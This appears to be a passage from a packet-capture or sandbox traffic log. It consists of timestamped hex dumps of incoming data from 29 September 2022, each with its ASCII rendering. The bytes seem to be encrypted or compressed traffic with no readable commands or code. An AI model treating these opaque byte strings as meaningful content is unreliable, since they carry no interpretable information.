                                                                                                                                                2022-09-29 12:51:45 UTC21001INData Raw: 9b ac 30 89 cf 4c ed bc e3 97 56 64 66 00 1d bb 3f 08 e6 f8 52 d1 2f 27 4a 56 bd ca a0 5d 23 0f e2 96 81 ca 48 79 3d 50 c6 b5 6e 68 62 5c b8 56 49 97 ae 6e 76 26 b1 48 4d 87 1f 3c b7 bf 08 ee 76 de db 9d 01 f6 64 8c 30 05 91 32 ab 59 02 fb 03 a3 b8 8f ce 1d 29 ab af d5 5f ea c4 13 1c b2 a7 a7 ac 66 25 ae bb a1 c4 f1 05 07 32 88 35 c7 27 36 91 ff 79 dd 40 c6 ba f9 c1 6e d6 b5 59 3f 4c 5a 66 18 93 27 58 f3 5e 8a 50 a9 3d f1 40 71 6f 7e b1 16 6f 61 bb 83 8c e0 35 fd f5 29 c4 e6 a1 00 60 56 79 5d 4e 35 2b 64 bb 27 9b b2 59 78 de df 67 6b 9d c8 3e 04 ae 94 df 03 85 dd c9 03 40 9e c9 54 d3 ae 6b b0 1b 64 29 0a 77 f3 e0 7c e6 8f 4e 63 74 a1 d6 38 28 51 90 1e b2 f0 06 7a be 89 b2 b6 3f f8 99 b8 b4 7d b3 86 d8 20 35 82 eb ec 07 c7 3b 38 c1 8d 9c f9 98 25 11 f7 2d
                                                                                                                                                Data Ascii: 0LVdf?R/'JV]#Hy=Pnhb\VInv&HM<vd02Y)_f%25'6y@nY?LZf'X^P=@qo~oa5)`Vy]N5+d'Yxgk>@Tkd)w|Nct8(Qz?} 5;8%-
                                                                                                                                                2022-09-29 12:51:45 UTC21017INData Raw: 50 db 3a 4b 8e 00 21 6f 3a b6 48 e2 a7 4a 3a c5 64 43 16 9d f2 42 fd 75 d4 1f 71 4d 40 7e d6 ab 9e 6d 6d 0a 48 5a a3 eb 5b 30 81 ea a4 87 26 10 62 bd 72 34 5c 93 d1 59 9f ee 05 0c 8d 5d 89 47 3b 17 d5 f3 a5 ef 11 dc 20 3e dc 52 eb 77 11 40 ae 7b 2e 1d 5a a5 20 38 db 43 27 a3 26 70 b7 aa 58 57 68 cf 2d 9d 6b 0e 96 83 9d 03 fd 88 da 52 23 86 bc fd 7c 0f 57 44 db 5d ab 1e fd c2 b0 21 13 c3 bd 42 63 08 30 ce 9b 02 4d ff 73 30 85 69 3a c9 78 78 97 dd 45 65 29 47 f0 56 56 fa 3a f4 7a 91 ba ad 44 c3 8b 8a f1 75 de d3 89 cc e4 3b 77 ae 22 1e 9b 67 82 e2 c0 ce 36 84 29 49 3d 08 72 3c 5c f6 89 6c e8 77 67 46 43 a5 10 b6 8b 36 97 25 61 87 f7 44 60 fb d6 48 c4 e4 8e 4a 6e 04 92 c2 28 a7 66 ac 77 e6 04 6f 22 31 37 e1 b4 df dc 73 1c 88 6e fe f2 c5 ce e4 27 57 21 7e 94
                                                                                                                                                Data Ascii: P:K!o:HJ:dCBuqM@~mmHZ[0&br4\Y]G; >Rw@{.Z 8C'&pXWh-kR#|WD]!Bc0Ms0i:xxEe)GVV:zDu;w"g6)I=r<\lwgFC6%aD`HJn(fwo"17sn'W!~
                                                                                                                                                2022-09-29 12:51:45 UTC21033INData Raw: ba 6f 17 54 71 97 7a 87 db 3a a5 b2 14 bb d9 22 b6 c4 b4 04 fe 02 9d 02 6b 35 e8 45 0d cd 2e 58 a3 79 fc 4f 17 4b 67 2e 87 8d 7d 22 dd 92 54 60 d1 d0 d7 90 45 d5 de 90 56 86 a0 52 c1 40 6a fd 77 9b 8e a9 1f 63 80 e2 58 17 75 9e 49 1a 98 18 36 d1 ef 9e bb d6 a3 dc 2c 51 2c 4d 1e 60 a5 83 c5 89 14 a0 20 20 f0 20 18 f5 1a 0f 26 dd ad ae 4c 60 3f 87 b3 9f b0 e8 d3 95 7f 6f b2 8a e0 21 8a da d7 44 47 db fe 3c ac e8 3b 2f 16 49 fc 5f 64 1a 81 9a 9b 33 f3 10 92 25 ef 93 a1 1f 48 0b ab ad b7 5a 6e 09 f2 61 87 55 c4 1b d9 70 cc d3 53 65 a5 24 89 1f 57 9b cf 06 f3 30 37 62 4a 34 11 ac d8 91 21 8f 22 7d 54 68 e2 d2 a4 6f ad ce f4 67 b6 ec 5e 35 f0 ef 17 7e 5b c4 46 85 c9 81 03 f4 29 19 5e d6 94 67 90 f6 a0 ec cd 74 a0 1b 57 01 0a 33 6b 84 80 bd 27 d6 0c a8 fc 73 df
                                                                                                                                                Data Ascii: oTqz:"k5E.XyOKg.}"T`EVR@jwcXuI6,Q,M` &L`?o!DG<;/I_d3%HZnaUpSe$W07bJ4!"}Thog^5~[F)^gtW3k's
                                                                                                                                                2022-09-29 12:51:45 UTC21049INData Raw: 6c 98 b6 7a 61 5b 7f ae ac f3 66 f1 18 4e ef a6 88 a5 90 a4 70 79 40 65 fc 55 6f f8 2e a3 41 71 ca 06 17 a7 af 9b 0f e3 12 81 4f fa 1e 89 5c 5b 6d 08 6a 53 67 ae 6e 28 b4 d0 a2 6a f0 41 f8 62 9c 07 8d a7 a2 cb cc 67 b5 bc ad 07 8a a4 86 df fe 31 6b b8 18 02 f0 68 7c f3 a8 7d b8 98 05 8c 11 47 9f 50 51 3f 4c 6d fb d7 c6 a2 b4 54 cc 5f ee 40 32 cd c6 97 bf 13 76 71 8c 2c 42 1b 39 1a 6b fb 07 68 45 62 4a be 18 34 d1 c1 24 8c 78 0b 77 09 2c 97 3d a8 3a 66 bf 36 92 b7 54 89 63 50 06 fc b2 2f f6 0b 07 61 74 03 53 19 07 11 53 79 c7 e2 75 ba b2 40 c0 41 04 83 fa 4d 54 ee b4 53 dc 95 ba a0 36 53 a7 2f 28 d9 48 d1 4d 0d 90 01 69 c4 17 f6 b1 7c 0c 82 bc f8 ac 55 7d 02 83 49 41 78 9a a5 3f ed 1a 43 21 77 85 d9 e4 f0 ee e6 3a b4 da 36 d9 72 06 58 44 f2 0f b9 db 42 3a
                                                                                                                                                Data Ascii: lza[fNpy@eUo.AqO\[mjSgn(jAbg1kh|}GPQ?LmT_@2vq,B9khEbJ4$xw,=:f6TcP/atSSyu@AMTS6S/(HMi|U}IAx?C!w:6rXDB:
                                                                                                                                                2022-09-29 12:51:45 UTC21065INData Raw: 3c ee 0b e1 7e dd 8c 72 fe 41 9d f7 fc 28 e7 3d bd e1 26 d0 61 07 b2 ec 8c af ed 39 50 99 ed bd ae 30 77 7b 05 f1 ca d8 0d 3a 76 3a e2 61 b8 86 4c eb 50 93 02 b6 f2 a2 29 06 0e 0c 1c a6 cd ab 35 84 33 3c 1e 86 c3 72 7d 40 fb a1 c3 66 53 a1 41 db 1e ca be 2a 66 52 69 23 ba 07 b2 4f d6 97 2d d6 6b b3 e7 5a 8b fb ec 21 2e b2 73 b3 75 61 e1 b2 f5 d7 a2 cd bb f3 16 6f 1e 45 16 64 cc 36 fe 6d ed 72 d1 42 2b 1e 48 20 7b 94 74 87 31 dd 3a 12 4d 2f 25 50 3b 67 ce aa e9 4e b1 ce 5c 6a a9 06 a2 fd aa ff 00 c9 3e 81 fc 3e 7b 3f ba ec 8e 90 42 8d 83 a6 2f 38 0d 78 d4 93 a3 d4 bf e9 43 28 23 b5 65 75 b8 34 0d c0 1f 6e e1 a9 22 fb a7 dc 84 0b 19 3b 07 38 d0 70 3a 37 d6 9a ad 51 78 58 f6 47 3f bc 06 92 63 9d cd 09 ce 8c 8c dc 07 75 2f 1d 8d 1f 7a 91 2e c0 df 6f e8 03 9e
                                                                                                                                                Data Ascii: <~rA(=&a9P0w{:v:aLP)53<r}@fSA*fRi#O-kZ!.suaoEd6mrB+H {t1:M/%P;gN\j>>{?B/8xC(#eu4n";8p:7QxXG?cu/z.o
                                                                                                                                                2022-09-29 12:51:45 UTC21081INData Raw: d0 d8 05 88 e6 ee 31 c1 2e 79 46 c3 62 ca 26 40 d7 91 2c 80 75 c6 6e 76 90 cb b2 32 00 62 c2 29 ef b4 b4 7f cc f7 84 91 ac e5 82 e6 0d c3 8c 35 e5 72 cd e3 78 f6 a0 b8 a6 62 c7 da f4 e0 40 df 9b f0 b4 5f 94 e1 c2 b4 4d 86 1e f8 c0 0c 98 24 aa 49 1b 36 e0 b0 50 5c 0c 52 4d f6 f6 9d f2 87 7d 8e 9c 4c d3 a0 d5 01 9a 30 da 70 0a ba 1a 36 e8 77 ea 42 90 29 2a b0 1b 54 d7 c5 e1 71 c6 79 4c 9c 4a 82 7a 40 d0 69 6b 06 e5 3e 01 06 48 b4 19 a5 95 85 c7 14 9f 10 7c d3 7e 04 cd 12 0d f8 7b 53 82 29 25 15 76 a0 be 54 a7 14 9a ef ee 3a c5 11 9f 26 3d 55 a1 fa f5 33 6f 6a 43 1b 88 91 5f 49 52 9e c8 f5 57 af 74 24 16 ed 3f f1 f4 11 9f cc 35 c3 7f 59 41 a3 4c 3a 69 76 60 b6 46 39 a4 22 f0 46 5c 66 72 c8 92 c5 bc 19 86 c8 0e 10 b7 24 34 39 6c 0d f9 2f c3 ff 3e 5b 12 9f b8
                                                                                                                                                Data Ascii: 1.yFb&@,unv2b)5rxb@_M$I6P\RM}L0p6wB)*TqyLJz@ik>H|~{S)%vT:&=U3ojC_IRWt$?5YAL:iv`F9"F\fr$49l/>[
                                                                                                                                                2022-09-29 12:51:45 UTC21097INData Raw: e6 ec 62 6d 0f 2a 70 8e fb e2 0b b2 72 1f 8b 95 ef f6 53 82 10 f9 ce 7b 9f 2a 3a 6b 4e 82 40 b0 93 6a 76 a2 f8 6d c8 58 9f 49 00 5e b1 16 e1 ef 35 a5 61 06 f1 31 5a 4e ab 6b 97 4f f4 34 87 c4 ea f9 37 96 74 d9 84 90 db f4 8c ae 66 01 a3 ca a3 e4 17 d7 30 04 ac 87 fa 2d 87 65 8c 46 5e 2c 9a 97 3a 68 c1 1e a4 73 a7 59 fd 8b fe 43 e8 af b5 54 81 a7 35 b7 da aa 9d b5 12 4c b4 a6 a2 bd 47 90 5a 59 e3 dc 49 bc a7 7b db 83 f0 7f a8 ae b2 d2 e6 37 9f 8c a6 3e 32 77 44 d0 08 e0 5c c8 37 ac 31 d3 3c 9a 38 2c 08 a3 ce 7f 8a 4a 7a 4b 25 0e e8 73 c7 13 e8 38 3c 09 29 9b 68 75 ca 6e 91 64 23 c3 d7 c8 62 ec 9b ad 6f 50 62 5d 35 78 1c be 5d e4 41 36 f7 5f d6 51 cd dd 91 4a 9f 51 9b 15 ea 97 77 e3 de cf 6e fa 91 66 d7 fd 34 a0 e4 4a 09 13 68 a9 45 db 0d f9 a8 ce 8b 84 bd
                                                                                                                                                Data Ascii: bm*prS{*:kN@jvmXI^5a1ZNkO47tf0-eF^,:hsYCT5LGZYI{7>2wD\71<8,JzK%s8<)hund#boPb]5x]A6_QJQwnf4JhE
                                                                                                                                                2022-09-29 12:51:45 UTC21113INData Raw: 66 81 ca 73 3c d9 fe b4 8d 42 0a 27 65 1e 49 d2 96 d0 c8 b9 b7 36 e0 c0 60 5c 8a d0 48 75 9d 75 ad 9f d4 4c 6f 59 96 97 5f 6e 8c 59 ce 11 24 d3 9a 3b 35 6b f3 bc 16 7c e5 7c 9b cd 9e 9b d4 b0 8e d6 2f 72 0c bc 1d 3f 3b 4b 33 48 9d bd 11 8f 86 98 d5 ec aa 04 82 9f 7b cd f8 84 e8 29 26 bc 7f 3d f5 7d 0b 6a 7e e2 35 c1 49 35 9d 55 33 d3 c0 7a 2c 53 ec a2 8c f0 9f 63 af 04 dc 92 88 5a c3 9e 1a a3 a5 95 88 a6 e2 87 e5 8a 85 39 a9 68 61 0c 78 fb 6e fb 09 1c 40 26 40 b8 3a 6d ba 14 5b 20 34 79 5a 3c b4 8b 12 aa a2 b7 93 3f 50 e8 ff 04 cb be e8 2c 47 54 f2 fc 8c 3f e9 e7 eb e9 b7 28 ee 88 e7 76 8d 2a c6 1a 56 83 41 f5 aa 55 79 85 d0 e5 42 32 4e 22 a0 e0 0b 6c 95 87 29 6b c6 42 de 91 01 04 12 d1 ab 56 85 3c 35 b0 51 1c 6a 48 bb 3d 70 86 31 3d 9b 95 df 5a 7b 4f 71
                                                                                                                                                Data Ascii: fs<B'eI6`\HuuLoY_nY$;5k||/r?;K3H{)&=}j~5I5U3z,ScZ9haxn@&@:m[ 4yZ<?P,GT?(v*VAUyB2N"l)kBV<5QjH=p1=Z{Oq
                                                                                                                                                2022-09-29 12:51:45 UTC21129INData Raw: 66 3c 49 e8 c7 b8 ce 37 f3 ca d2 df 65 86 34 9c 8c fc ba 29 7d eb 01 e5 64 6d 17 df 73 82 8d 17 42 e5 d8 60 0c 64 6c a1 39 4b 03 c8 78 89 84 0d 51 3f 6f ff f2 ea 4b b3 4d 11 f3 f7 1e 9f 06 72 0c fa 9f 60 60 0b db a3 bd 54 c4 42 a2 df b5 9f 2b b0 61 e5 16 6e 67 fa 40 60 6d e1 14 b3 28 22 0a 65 83 87 b8 13 4d 92 92 06 7a 4f 2e 18 25 a4 27 ca 9d b5 84 6c a5 2f 03 8a 71 e6 83 94 30 75 96 a5 68 29 b4 ea 5d dd 4a 05 37 8d 33 89 4e b3 2a 04 56 60 6a 28 9e 3b 6a 60 86 bd d7 9f f3 c8 9a 15 8f 15 61 00 a7 ae 33 c0 da 59 7b 38 bf d6 3d a7 62 b5 17 54 09 f8 d8 ad 57 07 ef fe b7 3e cd c3 af f5 04 bb d5 80 9b 33 f5 69 9e ee 4a dd 3d 65 64 2b 07 f9 98 6a 34 db 8b 44 e7 dc d9 0e 70 d6 fa 8c 80 f6 c3 80 cd 44 aa ed 35 73 99 e5 6d f3 ca e1 4a f8 91 41 54 c6 a2 fc 3a e9 ac
                                                                                                                                                Data Ascii: f<I7e4)}dmsB`dl9KxQ?oKMr``TB+ang@`m("eMzO.%'l/q0uh)]J73N*V`j(;j`a3Y{8=bTW>3iJ=ed+j4DpD5smJAT:
                                                                                                                                                2022-09-29 12:51:45 UTC21145INData Raw: 38 42 ae 47 70 5d 05 45 24 5a 42 96 fc 0b aa 7b 02 93 31 2a f2 24 90 74 20 0a 28 88 f7 84 94 ce 15 dd 8b 8a 00 a0 b6 db fe c7 ea 03 fb 9c 2e 88 9a 46 02 f7 fc 11 e8 33 aa 32 85 24 eb 19 53 49 42 30 19 a0 41 e4 9d c6 78 a4 67 e7 46 47 5a 19 54 e0 b5 2a fd 24 21 03 b0 f0 fe 3d 27 5d cd 5c c0 ca 95 6c 46 8b 8a b7 b8 5f 78 50 bb ad e7 14 31 09 3c 3d fa 6e bc 23 7f d4 c7 fa b8 4d 69 3d 4a 03 29 8a 1d 50 7c cf 61 6b e0 31 f3 ad 52 ea 80 39 63 c3 e2 ab 4d 15 28 60 42 48 b7 01 eb 3e 43 0b c1 4e a6 90 01 05 42 a0 38 a2 b8 a5 13 d7 e1 5a aa 3f e1 e0 df d5 8f 3e 3a ca 76 40 cc b9 b3 c3 7f 23 a3 c9 6a 73 48 e8 72 d7 92 ac 88 50 00 77 c8 20 ed db 0b cc 93 e3 53 3c 14 1e 5c 3a 7e 29 92 82 99 4e 84 ce 66 97 8e 0a 90 f7 cf 5d 46 45 de e6 b5 6a 51 47 99 bc c9 c7 2f b5 6a
                                                                                                                                                Data Ascii: 8BGp]E$ZB{1*$t (.F32$SIB0AxgFGZT*$!=']\lF_xP1<=n#Mi=J)P|ak1R9cM(`BH>CNB8Z?>:v@#jsHrPw S<\:~)Nf]FEjQG/j
                                                                                                                                                2022-09-29 12:51:45 UTC21161INData Raw: a4 90 e6 2d 70 74 ec d8 49 24 9e ee 1f 74 2d 25 27 69 45 6a 93 1a d2 10 52 a9 fa d2 19 3d 26 f7 3a cd d4 ba 62 cd 69 60 cb 23 38 a3 2f 4e 16 88 51 0b ee 89 15 fe 4c e6 7b 9b 45 ca 6a 49 4e 94 42 bc 98 45 30 e4 46 00 3f fa 42 24 37 86 c9 10 37 52 13 c5 10 17 fb 1f 01 3d 2a 17 b6 2a 1f 81 a4 66 12 03 86 9e 40 c8 81 fa ad 0b 9b 93 90 03 4c 13 6e af 28 4a 65 eb 14 9d 3e 4a 0a 28 47 02 cf 3a ea 6b 49 c0 78 fb 7f 2b 79 32 fe 2b b0 30 89 63 b8 c7 8b c6 21 5f 3d 58 a0 66 22 4e a9 6e e0 55 42 54 93 9d 72 58 dc 98 ff d6 1e b8 ab 51 f8 5e d4 f1 42 ef df d6 88 c3 cf 92 79 e9 2f 64 a2 ea c9 03 a1 34 57 f9 9a a9 ba 9b 7c 0f fb 52 88 ca d0 2a 60 38 8f 13 0f f4 a3 51 f2 9d 0f 75 e6 b2 e7 6f ea e8 69 94 f1 f9 2d 43 dc b2 21 d1 42 f0 01 a5 83 fc 2b 4c 61 c2 4e 02 18 84 ff
                                                                                                                                                Data Ascii: -ptI$t-%'iEjR=&:bi`#8/NQL{EjINBE0F?B$77R=**f@Ln(Je>J(G:kIx+y2+0c!_=Xf"NnUBTrXQ^By/d4W|R*`8Quoi-C!B+LaN
                                                                                                                                                2022-09-29 12:51:45 UTC21177INData Raw: 56 b3 3f c2 0a c4 58 11 e7 fb 8a ba 2f 6b 5f 69 26 d0 da f2 61 f8 3b 65 ac e5 22 13 b7 50 e1 7c a9 f1 85 d5 86 76 89 b2 fd c7 a3 57 34 f6 f9 f1 bf 31 f0 74 16 b4 70 70 8e d2 d7 90 8b d2 ca 52 b3 70 3e 6f a7 52 6d f8 27 a5 a6 6f b7 d7 1d 74 e2 f0 6e 5f d6 a4 cd f9 02 60 7d 79 13 4d 7c 71 bf 4e 5f a0 b7 e4 32 d9 16 1b 62 34 f8 ae cc de 1c 9c 18 ec 70 c5 80 fb 1b d5 6e 06 0a ec cb 14 f3 1b 62 0c cf a8 c8 71 93 2a 6b 9d eb fd 72 7c ec e4 18 f5 cf 36 2f 81 4e c8 23 f4 77 9d 2e 9e d6 58 89 33 07 71 5b cc 9c a8 8b 9a b7 45 c0 c8 be 70 24 2b f8 45 d9 e0 60 66 e1 2a 6d f1 da 9b 60 95 98 c6 ee 7a 97 e9 29 d0 27 c7 6a f4 85 13 ee 9b 43 4c ac 52 8a 67 17 43 cb 2f 47 07 d8 f8 d9 99 7c ca a8 5c 36 f7 be f3 78 66 63 45 00 73 5b ec 7e be 4d 38 94 7e d5 ad 76 90 23 3f cf
                                                                                                                                                Data Ascii: V?X/k_i&a;e"P|vW41tppRp>oRm'otn_`}yM|qN_2b4pnbq*kr|6/N#w.X3q[Ep$+E`f*m`z)'jCLRgC/G|\6xfcEs[~M8~v#?
                                                                                                                                                2022-09-29 12:51:45 UTC21193INData Raw: 23 05 01 35 87 2d fd cf 51 81 24 cc 94 5b 93 2a 0a e0 ea 25 c7 94 54 0c 66 8b ee d8 42 77 57 46 32 8c a0 6b a0 24 de 49 8a ba 33 61 ef 4c df 41 85 1e 58 8a 5c 32 aa e0 93 60 b1 18 82 d1 c2 5f 8f e9 9c 1f 65 d1 1e 1e 7b fd 93 95 ce d6 f4 9a 67 d0 45 de a0 30 d6 0c 22 aa e7 9b cf 78 95 4b 2c 46 77 55 80 08 07 07 5f 2f 8f 4b 41 45 f5 5e 27 11 cf f6 b3 d3 e4 8d 1a 40 50 71 4f 0f 2a e4 4b 1c c6 fd e2 be c0 08 ee 59 41 7a 57 b4 ac cd 02 af 9d f7 22 ac e9 4d 59 1d b1 6b cd c2 62 1e 2e 54 bd 2b 19 10 be 52 8a 6a 3b 8b 3f dc 11 55 de 1d 1d 36 d2 05 9d ad 01 2e f1 f6 bc db b3 68 bb 41 b4 15 84 30 c4 37 1e 22 4f 9a 86 77 ba 12 5e bc 7f 77 af bc 80 00 82 94 3c 4a ab a1 31 cf 92 6c 59 8f 90 92 7d f2 8b 55 b4 05 75 cd 56 7a f1 ca 74 a4 96 27 25 ed 81 3e e4 22 90 dd f9
                                                                                                                                                Data Ascii: #5-Q$[*%TfBwWF2k$I3aLAX\2`_e{gE0"xK,FwU_/KAE^'@PqO*KYAzW"MYkb.T+Rj;?U6.hA07"Ow^w<J1lY}UuVzt'%>"
                                                                                                                                                2022-09-29 12:51:45 UTC21209INData Raw: d7 79 78 39 45 e0 a4 aa 15 d6 44 6a 56 6e 02 e7 5f de 4a 48 c4 08 7a 9c 40 ec 6b f4 76 5b 11 6e ad 1a 34 7e 44 a3 fa 72 c9 a4 aa a4 68 30 64 06 49 99 47 4d fa fd e8 45 86 84 b1 cd 71 d9 16 b7 2d c4 6f 66 e1 ff 45 61 f9 5c 1c 72 20 46 3b 92 08 90 48 c9 eb 9e 01 eb 71 09 09 4f 05 1c d9 73 84 85 3a 2c 4e 48 d1 0a 22 63 5d 1a 2a 9b a8 e5 44 80 65 03 37 1c 68 2c fa 54 ee 8f 77 01 6f ea 7e fb 22 aa 14 c8 98 d4 a1 4e 27 e3 81 bc fa bc 94 db 4f ff 08 1f 68 01 a9 73 b1 56 87 44 79 06 fb 8a 46 99 e5 59 25 f8 6f 57 5c 85 4d b7 bc 58 c0 6e b3 68 60 0a 21 0c bf f9 e3 fb 5e eb 1b 12 0f 12 fb e5 8f e7 bd 3d 77 6c e5 be ac 27 d2 e4 73 60 c1 b8 e6 36 df 78 73 6c 6d 07 07 19 a3 06 25 b1 9e 68 41 fe e5 ea 8f 96 d6 33 7c 63 a6 78 22 61 f1 84 83 18 28 e0 cd a0 45 18 9b 19 65
                                                                                                                                                Data Ascii: yx9EDjVn_JHz@kv[n4~Drh0dIGMEq-ofEa\r F;HqOs:,NH"c]*De7h,Two~"N'OhsVDyFY%oW\MXnh`!^=wl's`6xslm%hA3|cx"a(Ee
                                                                                                                                                2022-09-29 12:51:45 UTC21225INData Raw: d3 4d a1 ac 1a 1d 75 fb e2 7d c3 74 b7 16 44 d3 e9 98 4a e5 b0 62 2b 6a 00 36 b6 81 b2 20 80 63 f4 50 c6 1b 12 d4 83 f7 24 be 58 02 e6 b4 81 eb a3 9e 43 15 e3 fa e3 1d 47 1d 91 db 9e af 09 20 54 7e 22 5d b0 db c0 f3 27 b9 63 c0 5f 2a 15 8c a3 a1 a1 f7 09 75 a6 8f 54 28 30 b2 31 92 d3 05 6d 27 6d 9b 14 27 5e 9b ba 68 ff b7 7f 68 3f 5f 91 55 62 1f 1b 97 9f 3f c4 ec 3c bd e2 04 d9 09 f7 7b 78 e5 59 57 1c f8 85 aa ed 72 b1 43 f8 dd 15 90 34 55 ec 96 d6 5d ec 94 bf f7 e9 ec a1 df dc 61 9f c6 b9 3e 28 eb 10 33 39 48 09 69 81 c1 92 6e 00 1c c7 6b 6b 18 57 37 9f f3 21 b2 16 aa d5 a9 f1 f9 c7 24 24 06 07 cd 00 8a b1 28 a8 8e aa e4 6b 60 c3 ad 51 af aa 5f 88 1f 1f 19 65 f6 92 c2 e0 86 c9 01 21 cc 02 d0 ea 67 18 4f 76 1d 16 39 ac 72 ed f7 0e 81 bb 06 69 6b 30 9c 69
                                                                                                                                                Data Ascii: Mu}tDJb+j6 cP$XCG T~"]'c_*uT(01m'm'^hh?_Ub?<{xYWrC4U]a>(39HinkkW7!$$(k`Q_e!gOv9rik0i
                                                                                                                                                2022-09-29 12:51:45 UTC21241INData Raw: 00 32 66 0f 36 52 6b eb 97 37 f6 79 8f 37 75 3a 6c f8 9d 12 df 2c 52 1f db 57 4f 12 8e d4 5b 9b 68 f4 d0 0d 23 6c 95 28 85 f0 97 04 08 d2 7d 37 cb 9a 9d 9c 81 66 08 08 f6 de 35 b1 7c 5b fb d6 3b 75 de fc 31 8c e8 3f d1 da 63 3e 2e 0e 32 0c fd cf c2 8a ca ed 53 c3 dc 54 a0 17 f5 6f 2b 5d 79 a7 1d e9 8f b8 00 16 ba c7 9f 33 c7 75 06 92 3a 3c 88 23 a5 ec 5e 8a 59 41 0a bb a1 57 01 b3 af 63 fa 0b 43 65 cf 9b e8 c5 ae b8 38 0e 7a b0 54 b7 ad 24 8d 53 e6 dc ee 5e 7d 37 f2 f0 a8 f4 f2 18 a5 87 01 66 1d d3 03 95 72 83 fe 66 ff e4 26 7f 25 c1 ba a5 c2 f9 ab e7 f4 26 9a be a6 50 c0 6b cc 0a 50 2a 14 23 7e 05 86 18 29 3c db f1 5a 39 10 35 e6 c3 9a 74 3a bf 8d bc 30 43 9d 41 05 0b cc ae 9d bc 0f 98 72 99 ca 9b 09 7f 2d e5 4a bb ff 0e f3 a5 84 9a 40 ee e9 9b 0e b7 91
                                                                                                                                                Data Ascii: 2f6Rk7y7u:l,RWO[h#l(}7f5|[;u1?c>.2STo+]y3u:<#^YAWcCe8zT$S^}7frf&%&PkP*#~)<Z95t:0CAr-J@
                                                                                                                                                2022-09-29 12:51:45 UTC21257INData Raw: a7 3a 97 6f a8 e4 f0 43 46 97 64 99 f6 9e 93 c8 94 bf 59 59 00 d2 6e b0 58 ed af 28 49 43 30 52 ab d2 46 a6 3c 19 4a 6b 47 ab f2 77 52 aa 1b 8f 6d dd 4a c2 47 24 19 4f da bb 32 13 14 70 40 f3 8a d4 39 51 ac 64 32 d8 2b 3f 7c 7e b6 09 ce be b6 38 a8 7f 94 44 84 22 92 79 ee 67 12 fe a3 8e 24 c4 48 15 b1 fe 64 a6 22 a8 38 d7 fc e2 ac 82 73 e6 41 94 3e 1a f4 d1 21 29 9c ae 72 dc 02 22 37 2c 2d c3 ab 09 5d 37 9c 69 e1 28 02 c2 99 00 35 5c f3 b4 57 60 43 ee 41 09 fc 81 5f fd 43 bd 64 21 e5 4d 27 2c e5 91 9f 45 18 3f 19 40 0d 83 e5 87 47 88 88 7d 9e 4e 4e 2f f0 ef 05 94 bb 90 e8 4b 56 20 d4 41 ec 3f 77 0f 56 6e 6c 61 f2 1c 4c 5a 1b 9a bc 04 d5 24 fe 48 29 71 b9 9d 15 da 19 bd 2b 44 12 0c 3f 45 d8 4c b6 73 a2 64 8b 5a 92 52 af 23 d2 00 3a 00 6d d2 d0 37 21 08 7a
                                                                                                                                                Data Ascii: :oCFdYYnX(IC0RF<JkGwRmJG$O2p@9Qd2+?|~8D"yg$Hd"8sA>!)r"7,-]7i(5\W`CA_Cd!M',E?@G}NN/KV A?wVnlaLZ$H)q+D?ELsdZR#:m7!z
                                                                                                                                                2022-09-29 12:51:45 UTC21273INData Raw: 86 38 d9 70 a9 4f 10 7a 1b b5 40 58 66 ae 98 60 9e 2d 8b b1 96 00 06 5c 55 07 f0 4c e5 35 c7 ba 12 2c 6d af 90 e8 94 99 12 50 b1 70 f0 da 2e e2 3e a4 f2 e4 7d cb 06 f6 b8 a7 23 41 bc 12 fe 98 89 3a ee ba 4f 1c c6 50 9d 63 55 0e 7a 82 c1 f4 84 ad e5 06 6a ed 71 af a2 db 8a 46 c1 fd 0a 4d 5f e1 da bd 19 c6 40 cc 81 ea b5 32 f6 69 22 85 ac 52 48 95 16 37 18 32 fa 22 c2 31 a9 6c f3 f5 d8 bc ec a6 eb 01 e1 8c a6 17 19 75 be 0a 8a f7 df c5 b7 27 a7 28 47 99 63 98 d3 26 44 56 ab 0c d0 2b 5e 61 94 5d 81 f4 03 5c b7 bd 6b 4b eb 15 fe 11 d9 06 d6 08 26 f9 77 f4 f8 3e de c2 98 b3 32 48 69 c9 c0 5f af 14 7c 3e 49 cf 2c 5b ad c1 18 29 e1 29 3a ce 96 71 69 a9 c2 8c 88 42 d5 e8 7b c4 20 9f e0 7d a2 0d 24 6b 89 fc 95 3b 63 96 c2 c3 d2 5f c7 93 71 78 0c 2e b9 de a8 6e 27
                                                                                                                                                Data Ascii: 8pOz@Xf`-\UL5,mPp.>}#A:OPcUzjqFM_@2i"RH72"1lu'(Gc&DV+^a]\kK&w>2Hi_|>I,[)):qiB{ }$k;c_qx.n'
                                                                                                                                                2022-09-29 12:51:45 UTC21289INData Raw: 4f b4 69 20 15 66 fb 42 5d b0 da 23 c3 bf 02 be 2c 7e 9a 0b 97 a6 d2 bc 81 55 e5 e8 55 eb 2b 5a 83 4b d8 47 73 c9 b2 90 80 0b fa ea e6 7f 61 36 de 98 b8 9d 7f da b2 da 37 59 73 36 73 8d 2a 2f 95 c2 db f2 c6 ae 12 1c 86 8c cf dd 35 1e a0 e3 25 18 5a 3d f1 0f c5 90 57 d1 08 7d 13 23 2f ab eb 1a 1a 62 0b 59 66 81 9a 88 07 82 1d 5f f7 93 f8 36 ea 86 da c4 b4 08 f9 03 36 e8 1f 29 55 bc af 5a 70 d5 58 ee 99 61 12 84 73 54 12 83 58 65 eb 4c 45 4a f3 f6 88 ab b7 9c 05 8f 5f c2 4b f6 f7 8e 13 a8 b0 56 4c 73 75 e1 8b 21 4a 05 95 85 da 02 2f d7 7c 24 c2 92 81 a9 05 7c e2 0b 87 eb dc 9f 17 94 db 31 14 d6 7e cd e7 1c 00 57 d2 c4 1e b0 4d 5b 2d 19 60 a6 cb b7 02 92 4d 60 e1 e6 24 39 52 e4 65 10 51 c4 89 c8 3c 28 a8 fe 83 5a 05 c2 20 4b 5d 07 a1 90 66 9c 1b d5 8e 85 e7
                                                                                                                                                Data Ascii: Oi fB]#,~UU+ZKGsa67Ys6s*/5%Z=W}#/bYf_66)UZpXasTXeLEJ_KVLsu!J/|$|1~WM[-`M`$9ReQ<(Z K]f
